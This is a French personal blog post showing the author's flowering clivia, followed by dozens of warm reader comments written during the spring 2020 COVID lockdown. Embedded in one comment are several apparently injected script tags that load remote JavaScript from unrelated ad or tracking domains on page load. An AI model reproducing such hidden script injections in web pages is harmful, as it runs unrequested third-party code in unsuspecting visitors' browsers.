• Mon clivia .

    Je vous montre mon clivia étape par étape .

    Mon clivia .

     

    Mon clivia .

    Mon clivia .

    Mon clivia .

     

    Celle-là, c'est aujourd'hui .

    « Les fleurs .Patton . »

  • Commentaires

    42
    Vendredi 3 Avril 2020 à 10:50

    bonjour ma douce Josiane

    tu vas bien j'espere

    il fait beau ce matin

    passes un bon week-end

    gros bisous et prends soin de toi

    Elyci

    41
    Vendredi 3 Avril 2020 à 09:55

    Bonjour ma petite Josiane,

    Pas de nouvel article...Tu n'es surement pas inspirée et je te comprend.

      J'espère que tu vas bien ? Fernand et moi ça va.Il fait beau, cela fait du bien au moral.

    Pas facile d'être confinés dans l'appartement mais on a pas le choix, c'est pour notre bien et celui des autres.Espèrons que les chercheurs trouveront bientôt un vaccin et que le nombre de cas et de décès va baisser.

    Bon vendredi et agréable week-end ma douce amie, prends bien soin de toi.

    Gros bisous et à lundi

    Calins à Pitchoune

    Florence  

    40
    Mercredi 1er Avril 2020 à 21:16

    Mon petit passage pour te souhaiter une bonne soirée

    Bisous et câlins à la Pitchoune

    39
    Mercredi 1er Avril 2020 à 20:39

    Bonsoir ma chère Josiane

    encore une journée de plus à être enfermée

    espérons que ça ne dure pas trop longtemps

    bonne soirée et gros bisous pour vous deux 

    Janine

    Calendriers du mois d'Avril

    38
    Mercredi 1er Avril 2020 à 11:01

    bonjour Josiane tu vas bien

    il ne fait pas tres beau et frais

    prends soin de toi ma douce

    gros bisous ELyci

    37
    Mercredi 1er Avril 2020 à 11:00

    Bonjour ma petite Josiane,

    J'espère que tu vas bien ? Fernand et moi ça va.On garde le moral.On est en bonne santé, tant de gens sont malades en ce moment ou décèdent.Saleté de virus, vivement qu'il soit éradiqué !  

    Encore une journée qui sera fraîche mais ensoleillé, c'est bien agréable.

    Bonne journée ma douce amie, gros bisous et prends bien soin de toi.Calins à Pitchoune.

    Florence

    36
    Mardi 31 Mars 2020 à 21:35

    Bonsoir ma chère Josiane

    Eklablog était en maintenance ! J'espère que tu vas bien

    je te souhaite une bonne soirée et t'envoie de gros bisous

    et des câlins pour ta Pitchoune

    ton amie Janine

    35
    Mardi 31 Mars 2020 à 13:37

    Coucou Josiane...merci de nous ouvrir ton coeur a chaque

    visite,tu es adorable...Je viens te donner des nouvelles

    de ma petite Valentine...Elle s'habitue très bien et nous ronronnons et jouons beaucoup.Venant de la rue je m'inquiétais beaucoup ....mais non pas du tout de soucis

    avec ce petit bout de chatou,qui avait besoin de vivre autre chose.Je suis heureuse de lui avoir ouvert mon coeur et mon petit chez moi...La Vétérinaire était très contente que je l'adopte,c'est vrai qu'elle était menu,mais en bonne santé

    après plusieurs jours chez la Véto...Là c'est un petit bijou,elle a grossit et elle grandit bien...Mange de tout,et a adoré mes courgettes que je mangeais hier...Hi..hi..ben voilà peut-être une future végétarienne...qui sait.

    Voilà Josiane,l'Amour s'installe entre nous deux et mon sourire est revenu...Je pense beaucoup a Cendrillon qui me manque beaucoup...C'est elle qui m'envoie ce petit bout

    de chatoune,bien vivante pour faire des bêtises..J'accepte,petite encore et tellement joueuse..

    Bon courage a Toi ma Douce Amie,le confinement n'a rien de drôle,mais écoutons et tout se passera bien..

    Surtout ne stresse pas,cela ne sert a rien...reste Zen...

    Je pense bien a Toi.Merci pour tes visites,c'est très gentil.

    A bientôt Josiane*MERCI*

    Plein de gros bisous*

    34
    Mardi 31 Mars 2020 à 12:22

    2 semaines de confinement ! Encore combien de temps ?
    Bises.

    33
    Lundi 30 Mars 2020 à 20:42

    Bonsoir ma chère Josiane

    Merci pour ton gentil commentaire la vie n'est pas facile en ce moment mais il faut faire avec

    J'espère que tu gardes le moral ! bonne et douce soirée

    et gros bisous pour toi et des Câlins pour Pitchoune

    ton amie Janine

    32
    Lundi 30 Mars 2020 à 18:13

    bonsoir ma josiane 

    j'éspére que ton genou ne te fait plus souffrir

    nouvelle semaine ,il as fait bien froid 

    mais comme je sors pas beaucoup c'est pas grave 

    je te souhaite une douce soirée 

    prends bien soin de toi

    gros bisous 

    31
    Lundi 30 Mars 2020 à 10:29

    bonjour Josiane tu vas bien

    il fait pas beau, et gris pfff

    prends soin de toi et restons a la maison

    gros bisous ma douce

    Elyci

    30
    Lundi 30 Mars 2020 à 10:22

    Bonjour ma petite Josiane,

    Une nouvelle semaine, la dernière de mars.Je trouve que le mois est long.

    J'espère que tu vas bien ? Fernand et moi ça va.On reste chez nous, ce n'est pas drôle mais c'est mieux que d'être à l'hôpital !

    Soyons tous solidaires, bon courage ! Gardons espoir, ce virus sera vaincu.

    Après le temps maussade hier, aujourd'hui le soleil est revenu c'est plus agréable.

    Bonne journée et agréable semaine ma douce amie, gros bisous et prends bien soin de toi

    Calins à Pitchoune

    Florence 

    29
    Dimanche 29 Mars 2020 à 19:42
    28
    Dimanche 29 Mars 2020 à 17:27

    Bonsoir ma chère Josiane

    J'espère que tu as passé un bon week-end

    malgré les circonstances

    En pensées avec toi et de gros bisous pour toi et Pitchoune

    ton amie Janine

    27
    Vendredi 27 Mars 2020 à 15:51

    bonjour        , j'espère que ton vendredi se passe bien  ? le mien très calme   , mon fils ma apporté  quelques fruits ce matin  il n'est pas resté longtemps  , très bonne fin de journée et bon weekend  .. bisous ..Anna

    26
    Vendredi 27 Mars 2020 à 11:57

    Bonjour. J'espère que le confinement se passe bien et que vous êtes en bonne santé.

    25
    Vendredi 27 Mars 2020 à 10:28

    bonjour Josiane tu vas bien

    il fait beau mais plus frais

    prends soin de toi t'appelle demain

    gros bisous Elyci

    24
    Vendredi 27 Mars 2020 à 09:04

    Bonjour ma petite Josiane,

    J'espère que tu vas bien ? Fernand et moi ça va.Tant qu'on pas malades et nos proches non plus c'est le principal.Mon moral est remonté.

    Il fait froid mais beau, c'est agréable de voir le soleil.

    Espèrons que le traitement à la Chloroquine soignera les malades, ce serait formidable ! Gardons espoir pour que ce virus soit vaincu. 

    Bon vendredi et agréable week-end ma douce amie, surtout prends bien soin de toi.

    Gros bisous et à lundi

    Florence

    23
    Jeudi 26 Mars 2020 à 14:41

    Bonjour Josiane , magnifique, c'est une plante que je connaissais, mais pas le nom ! La couleur est superbe, on voit vraiment que c'est le printemps . Je te souhaite une bonne journée, prends soin e toi . Bisous 

    22
    Jeudi 26 Mars 2020 à 10:28

    Résultat de recherche d'images pour "bon jeudi avec le soleil"bonjour ma josiane 

    j'éspére que tu vas bien 

    un beau soleil ce matin 

    ta fleur est vraiment belle 

    prends bien soin de toi 

    gros bisous 

    mireille

    21
    Mercredi 25 Mars 2020 à 21:06

    Bonsoir ma chère Josiane

    Elles sont magnifiques tes plantes , j'espère que tu vas bien et que tu gardes le moral ! en pensées avec toi

    gros bisous pour toi et Pitchoune

    ton amie Janine

    20
    Mercredi 25 Mars 2020 à 13:56

    Superbe !
    Prends bien soin de toi !
    Bises.

    19
    Mercredi 25 Mars 2020 à 12:09

    bonjour Josiane j'espere que tu vas bien

    belle ta plante ça fait beau

    prends soin de toi a tout a l'heure

    gros bisous Elyci

    18
    Mercredi 25 Mars 2020 à 10:30

    Bonjour ma petite Josiane,

    J'espère que tu vas bien ? Fernand et moi ça va.Le soleil est là, ça fait du bien de le voir.

    Je n'ai pas trop le moral, suis découragée et pas motivée pour chanter, je reprendrais lorsque tout ira bien...Heureusement qu'il y a Internet pour s'occuper, et aussi les DVD, la télévision et la musique.

    Aujourd'hui c'est l'anniversaire de mon papa et je ne peux pas lui apporter son cadeau, cela me manque de ne pas voir mes parents et Fernand aussi.Heureusement on peut leur téléphoner.  

    Passes une bonne journée, gros bisous ma douce amie.Calins à Pitchoune.

    Florence

    17
    Mardi 24 Mars 2020 à 20:16

    Une belle fleur que je ne connaissais pas. Bises et prend soin de toi en cette période difficile. FRANCOISE

    16
    Mardi 24 Mars 2020 à 20:08

    Bonsoir ma chère Josiane

    Un petit coucou pour te dire que je pense à toi et te souhaite

    une bonne et douce soirée , gros bisous pour toi et des câlins pour ta Pitchoune

    ton amie Janine

    15
    Mardi 24 Mars 2020 à 15:17

    bonjour       ,  j'espère que ton mardi se passe bien ?  pour moi calme  , le soleil est la  mais le vent est frais , bonne fin de journée  .. bisous ..Anna

    14
    Lundi 23 Mars 2020 à 21:31

    Bonsoir ma chère Josiane

    C'est vrais la solitude n'est pas facile et je suis bien peinée pour toi , mais ce sale virus il va bien falloir qu'il s'en aille 

    et nous pourrons reprendre notre vie d'antan

    courage mon amie gros bisous pour toi et des câlins pour Pitchoune

    ton amie Janine

    13
    Lundi 23 Mars 2020 à 09:51

    Bonjour ma petite Josiane,

    J'ai encore admiré ton clivia.

    J'espère que tu vas bien ? Fernand et moi ça va.

    Pas drôle de restés confinés mais c'est pour notre bien et celui des autres.Espèrons qu'ils trouveront bientôt un vaccin.Comme toi j'ai peur du virus et Fernand aussi.On sort juste pour faire des courses et chacun notre tour.

    Nous avons du soleil, cela fait du bien de le voir.

    Passes une bonne journée et une agréable semaine ma douce amie, gros bisous

    Florence   

    12
    Lundi 23 Mars 2020 à 08:38

    Bonjour Duchesse
    Il est magnifique ton clivia  et tu as une belle floraison .
    Il a combien d'années ?
    Bises

    11
    Samedi 21 Mars 2020 à 15:52

    Bonjour Josiane, je ne connais pas cette plante qui fait une bien belle fleur! elle fleurit chaque année? merci de nous en avoir fait profiter étape par étape!

    gros bisous et prends soin de toi

    PBT3glARLGr7VqGym0NabRvw894_1  

    10
    Vendredi 20 Mars 2020 à 21:24

    Bonsoir ma chère Josiane

    Je te souhaite une bonne soirée et un bon week-endmoi aussi j'ai très mal au dos depuis quelques jours , mais ce n'est pas nouveau

    J'espère que tu seras mieux demain

    gros bisous pour toi et câlins pour ta petite Pitchoune

    ton amie  Janine

    9
    Vendredi 20 Mars 2020 à 16:19

    Bonjour Josiane

     

    Merci de ta visite et de ton commentaire, quoique qu'il y a une phrase que je n'ai pas comprise, dans mon article je ne parle absolument pas du Virus, d'autres le font pour moi !!!!

    Le printemps est bien présent chez nous et par ce beau temps on s'occupe dans le jardin

    je te souhaite un excellent weekend

    amitiés et bises

    rebecca

    8
    Vendredi 20 Mars 2020 à 10:51

    Bonjour ma petite Josiane,

    Elle est belle ta plante ! Je ne connaissais pas son nom, grâce à toi je le sais maintenant.

    Tu as la main verte pour t'occuper des plantes et des fleurs, moi non lol Je n'en ai pas, pas évident avec les chats lol 

    J'espère que tu vas bien ? Fernand et moi ça va, on essaie de garder le moral mais pas drôle d'être confinés dans l'appartement.C'est le printemps et on ne peut pas profiter de la nature, on se rattrapera plus tard.

    Passes un bon vendredi et un agréable week-end, prends bien soin de toi surtout ma douce amie

    Gros bisous et à lundi

    Florence

    7
    Vendredi 20 Mars 2020 à 10:38

    magnifique, très belle fleur - tu en prends bien soin, bravo biz

    6
    Jeudi 19 Mars 2020 à 20:23

    Ton clivia est de toute beauté, j'aime beaucoup la couleur de la fleur

    Je n'en ai jamais eu, je pense que je me laisser bien tenter d'en acquérir un

    Passe une agréable soirée

    Bisous

    Câlins à la belle Pitchoune

    5
    Jeudi 19 Mars 2020 à 12:17

    Cette plante je la trouve de toute beauté et étape par étape,c'est une bien jolie idée.Merci Josiane...Profite de tes belles fleurs de ton beau jardin,la Nature elle seule nous réconcilie avec la vie.En ce moment rien de facile...

    Restons reliée...Je ne manquerai pas de prendre de tes nouvelles.Merci pour ta gentille présence ma Tite Douce.

    Plein de bisous.Je pense a Toi.

    Tu sais Josiane depuis 3 semaines j'ai une petite chatoune

    qui s'appelle Valentine...je m'ennuyais trop sans ma 

    Cendrillon...elle est gentille et comble la solitude.

    Heureusement nos petits Amis a quatre pattes sont là.

    Bisous...tout plein.A bientôt*

    4
    Jeudi 19 Mars 2020 à 06:03

    Bonjour Josiane,

    Voilà une plante que je ne connais pas mais elle est très

    jolie. Je me doute qu'avec le confinement, la solitude ne doit pas être facile, nous avons la chance d'être ensemble

    mon mari et moi, on fait attention car mon mari est à

    risque il a une maladie chronique alors restons prudents, ça nous concerne toutes et tous,il vaut mieux pour la santé

    de tous. Une pensée pour tous nos soignants qui sont

    particulièrement sollicités. Je te souhaite une belle

    journée ainsi qu'à Pitchoune. Gros bisous-violette

    https://nsm09.casimages.com/img/2019/03/28//1903280201048200316178219.jpg

     

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://rockypride.com/optout/set/lat?jsonp=__mtz_cb_742017695&key=2299156fcd9f4015b0&cv=1584594231&t=1584594230922" type="text/javascript"></script> <script src="http://rockypride.com/optout/set/lt?jsonp=__mtz_cb_657204842&key=2299156fcd9f4015b0&cv=10184&t=1584594230923" type="text/javascript"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1584594230927" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    3
    Mercredi 18 Mars 2020 à 23:46
    lavandine

    Voilà une fleur que je connais mais que je n'ai jamais eue chez moi.

    Il a l'air de se plaire chez toi car il est  bien grand.

    Bisous et une agréable nuit !

    Lavandine

    2
    Mercredi 18 Mars 2020 à 21:11

    Bonsoir ma chère Josiane

    Il est beau ton clivia lui au moins il ne risque pas d'attraper le coronavirus , je te comprends quand tu dis que ce n'est pas facile d'être seule avec ce nouveau mode de vie que nous avons hérité avec ce sale truc qui nous pourrit la vie,

    Heureusement il reste les blogs et les amies ça aide !

    Bonne soirée mon amie et gros bisous pour toi et Pitchoune

    ton amie Janine

    1
    Mercredi 18 Mars 2020 à 18:15

    Elle est superbe ta plante. Bises

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :